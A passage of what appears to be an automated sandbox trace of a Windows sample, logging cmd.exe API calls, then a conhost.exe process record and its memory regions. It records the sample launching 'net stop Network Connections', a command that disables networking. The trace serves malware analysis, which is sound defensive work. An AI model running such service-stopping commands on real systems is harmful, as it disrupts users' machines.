(HeapHandle=0x400000, Flags=0x8, Size=0x218) returned 0x40af38 [0297.222] GetProcessHeap () returned 0x400000 [0297.222] RtlReAllocateHeap (Heap=0x400000, Flags=0x0, Ptr=0x40af38, Size=0x112) returned 0x40af38 [0297.222] GetProcessHeap () returned 0x400000 [0297.222] RtlSizeHeap (HeapHandle=0x400000, Flags=0x0, MemoryPointer=0x40af38) returned 0x112 [0297.223] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0297.223] GetProcessHeap () returned 0x400000 [0297.223] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0xe0) returned 0x40b058 [0297.225] GetProcessHeap () returned 0x400000 [0297.225] RtlReAllocateHeap (Heap=0x400000, Flags=0x0, Ptr=0x40b058, Size=0x76) returned 0x40b058 [0297.225] GetProcessHeap () returned 0x400000 [0297.225] RtlSizeHeap (HeapHandle=0x400000, Flags=0x0, MemoryPointer=0x40b058) returned 0x76 [0297.226] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0297.226] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0297.227] GetLastError () returned 0x2 [0297.227] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0297.227] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x40b0d8 [0297.227] GetProcessHeap () returned 0x400000 [0297.227] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x14) returned 0x4076a0 [0297.227] FindClose (in: hFindFile=0x40b0d8 | out: hFindFile=0x40b0d8) returned 1 [0297.227] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0297.227] GetLastError () returned 0x2 [0297.227] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x40b0d8 [0297.227] GetProcessHeap () returned 0x400000 [0297.227] RtlReAllocateHeap (Heap=0x400000, Flags=0x0, Ptr=0x4076a0, Size=0x4) returned 0x400590 [0297.228] FindClose (in: hFindFile=0x40b0d8 | out: hFindFile=0x40b0d8) returned 1 [0297.228] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0297.228] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0297.228] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0297.228] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f728, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f70c | out: lpAttributeList=0x19f728, lpSize=0x19f70c) returned 1 [0297.228] UpdateProcThreadAttribute (in: lpAttributeList=0x19f728, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f728, lpPreviousValue=0x0) returned 1 [0297.228] GetStartupInfoW (in: lpStartupInfo=0x19f760 | out: lpStartupInfo=0x19f760*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0297.228] GetProcessHeap () returned 0x400000 [0297.228] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x18) returned 0x4077c0 [0297.228] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0297.228] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0297.229] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0297.229] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0297.229] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0297.229] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0297.229] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0297.229] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0297.229] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0297.229] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0297.229] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0297.229] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0297.229] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0297.229] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0297.229] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0297.229] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0297.229] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0297.229] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0297.229] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0297.229] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0297.229] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0297.229] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0297.229] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0297.229] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0297.229] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0297.229] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0297.229] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0297.229] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0297.229] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0297.229] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0297.229] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0297.230] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0297.230] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0297.230] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0297.230] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0297.230] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0297.230] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0297.230] GetProcessHeap () returned 0x400000 [0297.230] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x4077c0) returned 1 [0297.230] GetProcessHeap () returned 0x400000 [0297.230] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0xa) returned 0x40b0d8 [0297.230] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0297.233] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop Network Connections", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop Network Connections", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f6fc | out: lpCommandLine="net stop Network Connections", lpProcessInformation=0x19f6fc*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x1320, dwThreadId=0x1324)) returned 1 [0297.251] CloseHandle (hObject=0xa4) returned 1 [0297.251] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0297.251] GetProcessHeap () returned 0x400000 [0297.251] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x409d88) returned 1 [0297.252] GetEnvironmentStringsW () returned 0x409d88* [0297.252] GetProcessHeap () returned 0x400000 [0297.252] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0xa76) returned 0x407cf8 [0297.252] FreeEnvironmentStringsA (penv="=") returned 1 [0297.252] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0297.669] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x19f694 | out: lpExitCode=0x19f694*=0x1) returned 1 [0297.669] CloseHandle (hObject=0xa8) returned 1 [0297.669] _vsnwprintf (in: _Buffer=0x19f77c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f69c | out: _Buffer="00000001") returned 8 [0297.669] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0297.669] GetProcessHeap () returned 0x400000 [0297.670] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x407cf8) returned 1 [0297.670] GetEnvironmentStringsW () returned 0x40b1e0* [0297.670] GetProcessHeap () returned 0x400000 [0297.670] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0xa9c) returned 0x407cf8 [0297.670] FreeEnvironmentStringsA (penv="=") returned 1 [0297.670] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0297.670] GetProcessHeap () returned 0x400000 [0297.671] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x407cf8) returned 1 [0297.671] GetEnvironmentStringsW () returned 0x40b1e0* [0297.671] GetProcessHeap () returned 0x400000 [0297.671] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0xa9c) returned 0x407cf8 [0297.671] FreeEnvironmentStringsA (penv="=") returned 1 [0297.671] GetProcessHeap () returned 0x400000 [0297.671] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x40b0d8) returned 1 [0297.671] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f728 | out: lpAttributeList=0x19f728) [0297.671] _get_osfhandle (_FileHandle=1) returned 0x3c [0297.671] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1 [0297.674] _get_osfhandle (_FileHandle=1) returned 0x3c [0297.674] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xd2f40c | out: lpMode=0xd2f40c) returned 1 [0297.675] _get_osfhandle (_FileHandle=0) returned 0x38 [0297.675] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xd2f408 | out: lpMode=0xd2f408) returned 1 [0297.675] SetConsoleInputExeNameW () returned 0x1 [0297.675] GetConsoleOutputCP () returned 0x1b5 [0297.676] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd2f460 | out: lpCPInfo=0xd2f460) returned 1 [0297.676] SetThreadUILanguage (LangId=0x0) returned 0x409 [0297.676] exit (_Code=1) Thread: id = 223 os_tid = 0x938 Process: id = "39" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x6f056000" os_pid = "0xc20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "38" os_parent_pid = "0x738" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3114 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3115 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3116 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 3117 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3118 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3119 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3120 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 3121 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 3122 start_va = 0x7ff7625c0000 end_va = 0x7ff7625d0fff monitored = 0 entry_point = 0x7ff7625c16b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 3123 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3124 start_va = 0x6d0000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 3125 start_va = 0x7ffd4d670000 end_va = 0x7ffd4d857fff monitored = 0 entry_point = 0x7ffd4d69ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3126 start_va = 0x7ffd4e1c0000 end_va = 0x7ffd4e26cfff monitored = 0 entry_point = 0x7ffd4e1d81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3127 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3128 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 3129 start_va = 0x90000 end_va = 0x14dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3130 start_va = 0x7ffd4df00000 end_va = 0x7ffd4df9cfff monitored = 0 entry_point = 0x7ffd4df078a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3132 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 3133 start_va = 0x7d0000 end_va = 0x95ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 3134 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3135 start_va = 0x7ffd45030000 end_va = 0x7ffd45088fff monitored = 0 entry_point = 0x7ffd4503fbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 3136 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 3137 start_va = 0x7ffd4dc70000 end_va = 0x7ffd4deecfff monitored = 0 entry_point = 0x7ffd4dd44970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3138 start_va = 0x7ffd4da60000 end_va = 0x7ffd4db7bfff monitored = 0 entry_point = 0x7ffd4daa02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3139 start_va = 0x7ffd4d860000 end_va = 0x7ffd4d8c9fff monitored = 0 entry_point = 0x7ffd4d896d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 3140 start_va = 0x7ffd4e9d0000 end_va = 0x7ffd4eb25fff monitored = 0 entry_point = 0x7ffd4e9da8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3141 start_va = 0x7ffd4d8d0000 end_va = 0x7ffd4da55fff monitored = 0 entry_point = 0x7ffd4d91ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3142 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3143 start_va = 0x7ffd50380000 end_va = 0x7ffd504c2fff monitored = 0 entry_point = 0x7ffd503a8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3144 start_va = 0x7ffd4e160000 end_va = 0x7ffd4e1bafff monitored = 0 entry_point = 0x7ffd4e1738b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3145 start_va = 0x7ffd4e2e0000 end_va = 0x7ffd4e31afff monitored = 0 entry_point = 0x7ffd4e2e12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3146 start_va = 0x7ffd4db80000 end_va = 0x7ffd4dc40fff monitored = 0 entry_point = 0x7ffd4dba0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3147 start_va = 0x7ffd4b010000 end_va = 0x7ffd4b195fff monitored = 0 entry_point = 0x7ffd4b05d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 3148 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 3149 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3150 start_va = 0x960000 end_va = 0xae7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000960000" filename = "" Region: id = 3151 start_va = 0xaf0000 end_va = 0xc70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000af0000" filename = "" Region: id = 3152 start_va = 0xc80000 end_va = 0x207ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c80000" filename = "" Region: id = 3153 start_va = 0x2080000 end_va = 0x227ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 3154 start_va = 0x600000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 3155 start_va = 0x7ffd4eb30000 end_va = 0x7ffd5008efff monitored = 0 entry_point = 0x7ffd4ec911f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 3156 start_va = 0x7ffd4cb80000 end_va = 0x7ffd4cbc2fff monitored = 0 entry_point = 0x7ffd4cb94b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 3157 start_va = 0x7ffd4cce0000 end_va = 0x7ffd4d323fff monitored = 0 entry_point = 0x7ffd4cea64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 3158 start_va = 0x7ffd4e480000 end_va = 0x7ffd4e526fff monitored = 0 entry_point = 0x7ffd4e4958d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3159 start_va = 0x7ffd500f0000 end_va = 0x7ffd50141fff monitored = 0 entry_point = 0x7ffd500ff530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3160 start_va = 0x7ffd4cb70000 end_va = 0x7ffd4cb7efff monitored = 0 entry_point = 0x7ffd4cb73210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 3161 start_va = 0x7ffd4d5b0000 end_va = 0x7ffd4d664fff monitored = 0 entry_point = 0x7ffd4d5f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 3162 start_va = 0x7ffd4cb10000 end_va = 0x7ffd4cb5afff monitored = 0 entry_point = 0x7ffd4cb135f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 3163 start_va = 0x7ffd4caf0000 end_va = 0x7ffd4cb03fff monitored = 0 entry_point = 0x7ffd4caf52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 3164 start_va = 0x7ffd4b470000 end_va = 0x7ffd4b505fff monitored = 0 entry_point = 0x7ffd4b495570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 3165 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 3166 start_va = 0x2280000 end_va = 0x25b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3167 start_va = 0x50000 end_va = 0x51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 3168 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 3169 start_va = 0x80000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 3170 start_va = 0x1d0000 end_va = 0x1f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Region: id = 3171 start_va = 0x640000 end_va = 0x699fff monitored = 1 entry_point = 0x6553f0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 3172 start_va = 0x25c0000 end_va = 0x27d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025c0000" filename = "" Region: id = 3173 start_va = 0x27e0000 end_va = 0x29f5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027e0000" filename = "" Region: id = 3174 start_va = 0x7d0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 3175 start_va = 0x950000 end_va = 0x95ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000950000" filename = "" Region: id = 3176 start_va = 0x2a00000 end_va = 0x2c10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a00000" filename = "" Region: id = 3177 start_va = 0x2080000 end_va = 0x2188fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 3178 start_va = 0x2270000 end_va = 0x227ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 3179 start_va = 0x640000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3180 start_va = 0x7ffd4e320000 end_va = 0x7ffd4e479fff monitored = 0 entry_point = 0x7ffd4e3638e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3181 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 3182 start_va = 0x2190000 end_va = 0x224bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002190000" filename = "" Region: id = 3183 start_va = 0x70000 end_va = 0x73fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 3184 start_va = 0x7ffd4a370000 end_va = 0x7ffd4a391fff monitored = 0 entry_point = 0x7ffd4a371a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 3185 start_va = 0x7ffd4b200000 end_va = 0x7ffd4b212fff monitored = 0 entry_point = 0x7ffd4b202760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 3186 start_va = 0x7ffd4c900000 end_va = 0x7ffd4c955fff monitored = 0 entry_point = 0x7ffd4c910bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 3188 start_va = 0x1d0000 end_va = 0x1d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 3189 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 3190 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 3191 start_va = 0x680000 end_va = 0x684fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 3192 start_va = 0x690000 end_va = 0x690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 3193 start_va = 0x6a0000 end_va = 0x6a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 